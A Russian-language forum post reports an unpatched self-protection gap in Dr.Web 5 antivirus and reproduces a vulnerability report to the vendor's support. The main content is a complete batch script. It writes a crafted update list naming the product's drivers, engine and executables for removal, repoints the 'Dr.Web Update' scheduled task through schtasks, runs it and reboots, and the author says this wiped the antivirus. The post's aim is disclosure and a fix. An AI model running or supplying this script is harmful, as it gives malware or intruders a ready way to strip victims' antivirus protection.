Новый участник
Сообщения: 16
Благодарности: 1
|
Профиль
|
Отправить PM
| Цитировать
Уже дней десять по найденной уязвимости самозащиты Drweb5 их техподдержка молчит, а сообщение на форуме тупо удалили без уведомления. Игнор. Ну что ж... Может быть мне здесь помогут "залатать" эту дырочку. Нужно как-то заставить самозащиту веба защищать задачу в планировщике ОС, которая отвечает за обновление. Копия стёртого и заигноренного сообщения в техподдержке ниже:
=====================================================
Самозащита на задаче в Планировщике задач не стоит [Dr.Web Update]. Это означает, что после запуска примерно вот такого батника (ниже) антивирус сам себя уничтожит. Конечно, чтобы сделать это, надо обойти UAC, если он вообще не выключен, и иметь права администратора (а кто их дома не имеет?). Но самозащита тут скромно смолчит, а потом её самой не станет вместе с вебом. Планируют ли разработчики это исправить? Очень уж легко получается эту "самозащиту" обойти=(
CODE
md c:\killme
echo [DrWebUpdateList]>c:\killme\drweb32.lst
echo [500]>>c:\killme\drweb32.lst
echo -timestamp,>>c:\killme\drweb32.lst
echo -update.drl,>>c:\killme\drweb32.lst
echo -drweb32.dll,>>c:\killme\drweb32.lst
echo -*.vdb,>>c:\killme\drweb32.lst
echo -drw433*.*,>>c:\killme\drweb32.lst
echo -dwr433*.*,>>c:\killme\drweb32.lst
echo -dwn433*.*,>>c:\killme\drweb32.lst
echo -drw444*.*,>>c:\killme\drweb32.lst
echo -dwr444*.*,>>c:\killme\drweb32.lst
echo -dwn444*.*,>>c:\killme\drweb32.lst
echo -drw*.txt,>>c:\killme\drweb32.lst
echo -dwr*.txt,>>c:\killme\drweb32.lst
echo -dwn*.txt,>>c:\killme\drweb32.lst
echo -dwshield.sys,>>c:\killme\drweb32.lst
echo -spiderui.dll,>>c:\killme\drweb32.lst
echo -<wnt>%SYSDIR%\drivers\drwebnet.sys,>>c:\killme\drweb32.lst
echo -<wnt>%SYSDIR%\spider.cpl,>>c:\killme\drweb32.lst
echo -drwspcnt.dll,>>c:\killme\drweb32.lst
echo -<wnt>%SYSDIR%\drivers\dwprot.sys,>>c:\killme\drweb32.lst
echo -<wnt>dwprot.dll,>>c:\killme\drweb32.lst
echo -<wnt>%CommonProgramFiles%\Doctor Web\Scanning Engine\dwengine.exe,>>c:\killme\drweb32.lst
echo -<wnt>%CommonProgramFiles%\Doctor Web\Scanning Engine\dwinctl.dll,>>c:\killme\drweb32.lst
echo -<wnt>spideragent.exe,>>c:\killme\drweb32.lst
echo -<wnt>spideragent_set.exe,>>c:\killme\drweb32.lst
echo -drweb32w.exe,>>c:\killme\drweb32.lst
echo -drwebwcl.exe,>>c:\killme\drweb32.lst
echo -<wnt>dwebllio.dll,>>c:\killme\drweb32.lst
echo -drwsxtn.dll,>>c:\killme\drweb32.lst
echo -drwadins.exe,>>c:\killme\drweb32.lst
echo -<wnt>spidernt.exe,>>c:\killme\drweb32.lst
echo -<wnt>spiderui.exe,>>c:\killme\drweb32.lst
echo -<wnt>spidercpl.exe,>>c:\killme\drweb32.lst
echo -<wnt>spider.sys,>>c:\killme\drweb32.lst
echo -spiderml.exe,>>c:\killme\drweb32.lst
echo -spml_set.exe,>>c:\killme\drweb32.lst
echo -drwebsp.dll,>>c:\killme\drweb32.lst
echo -*.dwl,>>c:\killme\drweb32.lst
echo -*.wav,>>c:\killme\drweb32.lst
echo -drwreg.exe,>>c:\killme\drweb32.lst
echo -drweb32.key,>>c:\killme\drweb32.lst
echo -DRWEBUPW.exe,>>c:\killme\drweb32.lst
echo [DrWebUpdateListEnd]>>c:\killme\drweb32.lst
schtasks.exe /change /ru system /tn "Dr.Web Update" /tr "\"C:\Program Files\DrWeb\DrWebUpW.exe\" /go /st /qu /reg- /rp+drwebupw.log /URL:\"C:\killme\""
schtasks.exe /Run /TN "Dr.Web Update"
ping 127.0.0.1
shutdown -r -t 1
Похожий скрипт для 64-хбитной семерки удалил практически всё. Скриншот после перезагрузки прилагается....
|
